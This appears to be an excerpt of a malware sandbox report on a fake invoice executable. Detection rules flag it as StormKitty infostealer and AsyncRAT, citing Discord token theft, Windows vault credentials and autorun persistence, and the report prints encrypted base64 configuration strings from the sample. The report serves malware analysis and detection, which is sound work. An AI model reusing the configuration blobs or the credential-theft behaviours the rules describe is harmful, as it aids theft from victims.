Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: Invoice-BL. Payment TT $ 28,945.99.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SFHAWxtoIpgL.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, Settings.cs	Base64 encoded string: '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
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, Settings.cs	Base64 encoded string: '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
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, Settings.cs	Base64 encoded string: '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
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, Settings.cs	Base64 encoded string: '+0jQo86AkBkCOrCH+I5z9ufZ0f2IeIa7hIsGYfQbx0XZ1IbKs46jp9NBerukEyJoQcw9wYFFiESfBm8jb+rSjQ==', 'Z5pZYvRJIFTn8wlNIbceeqsxsKyiih9zS9G1Q49QpoEQOhv8FIVYhJy3JtaDzo7YHrinzRvWHLMY6KkdaCxT9w==', 'lv3eVVbrtyehpFQQS+O85pqbqHpE531GsoTORjAIVkmXnn29fizpHaeprUcfXfR7i1rDsUVnA0uHFazCOt353g==', 'vx/BE7jbRUB6mf7JvBe7Aqms5ens79dF75erQeF42sT5vvO+4N9X2zk0aqxqkuguWA/A06An2byEZbqi5N4oc6eDd74t2bt19gesw0UIL8c=', 'nXKe4oAN0iBYluL0NQNKasuRdPEYHHvoJHBCMT+I7iGe41QiUcLXnSquqUdY5Xs+MVUGLpfUfaHVmqMC/SfaaZX1JoFtVGWwClIrpf8FsiO8IpqEKgM6FNqF0Ognzq1b7tp3rIjM2Aq8StkwWXkHUOYxI8qr8GADLi4Ylq0kgwpIiGkb1z/6p5ujAOACIjgw5x9IhvGtTr+pZgOuq775zWQtOZIwgHiwfn+8HAB7TWqKBA5reeQ+GcSe1AVSSvIwL2m9YqmANxvUV/z6P+tntZK9khBosBwHhOiwRWXG7/WpzOHXHsguz9PsgGj8x6vv563lVxWQAVbkGsiVnDkQDg6utGPUefYXoghcReIUhhO5SZiVt8QiJpJVzlEJFFLSzuPdrYoqneInXeUrZciNHk6Hx/qmc0c/OP8zrIiuTOIjkA4/48e72ZkKUXXjDM9NHJYaFkiW7Wy09F3klKb3gXQb7uQKAQ3myxaI9H4viFDzQ+c6ot/Tt/9sm+I5UXFT4EyPgUXKxHI2gqb+mGyqQkOPuBaH45ePwop7BrYpY/1efw+fAOhY4ManjMs6wjMfCyT+RgVfeAolPHVmFc7THpeFENsGzPu4PaQTk7KcIXPlIOAC8nCCQkJ8Z/VkapUueXmA9ouv8rVUX3RDzPNuYQMj6eQGRGoJaiSi1XnTSB+pFxXuymASnVeMHzS1YJc6S1Fy8xnlzJW7wkSc0EzMjLWBFsM3Hqd3b6QH+6AftKjxmEGRAffkIkZg1kgQascpVqw/SlkjNmcC+8/jbyDIsnjfoUA7PIQ6NaNjAWDQ8QJGwp8fEK5MOILen18Pkqix0uS7isDBkB1ChKdH/cR8LyKqqAvhf24jkqpsdpnndycZXCnmG14YSdhSJD7P54U5ewxu5hWc0WDpXKCJSpKp+Gy3I3bLus4hISrBmvvjsDY5WaJWh4rN+zn3lBsaEVXz0YdEKxHlnUuHD4RTG2YEeg7l4NQmHuxkbkoOBiV/EkTcqVMpsm9VZOkIK44jxyFHyoqVqgnllEW2n6iThOHqhykb1ivXu6OBFYSpXiPeRpYEVBpUMWjvXy2wTmgsSDG43S2ISnly04sL8+POHl7dAZhsvW/Yb9kNVsrSyQzUi4FENeRphe5EQb59noFZbgoVWYsKCEtLnBLTOMUtNywmHbDlomrWnS16Z9wMlfLoBZwDq7q2Z/8FecilNhRqRnip5R1F+C7L5+PkGgbxv7hvDfnKlP68bC41b2+l+8MfkH/OIC4Pf4M4KBF7l5svnS6/SkGqtZ8RNySst5Cz/y7LYkWD8jrSInEMDXNvDkVq5egyR0WF52kgbiLK08K4cGSVG0q7Eo0WyabA8Ez1czK/JmEpDEJ2fggJBNfU8KOpygs/tUwEnJjj+fb+pogdcNDftRu+jLkC232YXIpGdY/sIUc03VXzJPbMwZVCZXmWZepd5FRkB7xBL6Vel/AIR6HMGe8APTLt5mtX7wMzt7tMf/KG7tH20e6uEYu7pmgfFXjU9LksVMIL8YZhezJqFHf+AW70OMfSNkYnu/sPLvlXSRD/7WVGTUjXtDFgTAPWVSLDiCkDi+DZ0aRUDufzdLaKLL0QaIiFxTE7R8TtaHooLbq1YGUnnGCmIzJH9yWg96yCDebbKI4TbcuNBfBpHaQ4nFL0/eu7rIDtbNrlM4pVdH1/kmax+IW7RBa5AH56ZoN8v6ZTK8vGmIX7JDWynYrSqFEetkjXYL9hoVT4TAhayuqAjY3rXtL1Wr+0ixxK+3nnBmEGbv4B5CV6UW1op7x6JljRFVhPGnU7gQdZMhTIlzx9V0r26bfwepof5aI3lQUjqV5nqB2K2M86T57ul4upx+UKts/3cqFm4uW6KGU+QlDJH5X5MpBAzlwDVFqO90gNG1iaO7L+5wB+mCR7GMOHWRvaEGPx7APVOR8Yfp4eJafkkh46BMOLWmuEzIx6XukDk9O7vsW9XMC88CuUsW5yCR+i61dDX2/1vuohT3RYT8mpm9I3h+dZkQYawTD8WPh9v/RihPHhp2PuM1O1s73iF+/DL+NvEn03K5FJ7pN5QdQ+Dh7ZxZ0gCHxC7kXaGz5krfPAZ7jnR61ojVDZyZkDUytVwZqVtNqOgW/kGZVrzkevqyK/ZDvyrRKd1Rr4dUYQxUc0X2tvBIamwGdwTkytiQWQUxkR2u+8P4HB6uPjaMAVvJ4ms7qv2bL9xb4OzTbG0Zk8J2p+N5t9uSrqVYVXn0pLQTZYXDpEbDKIjM4eSXjs9+iR68v+QgfwZfx380SFEkX8USuAGi+nknn2750JpeIa0K2PJLG7REXQxTTndMK8NHumykm63bZKIosdjC8=', 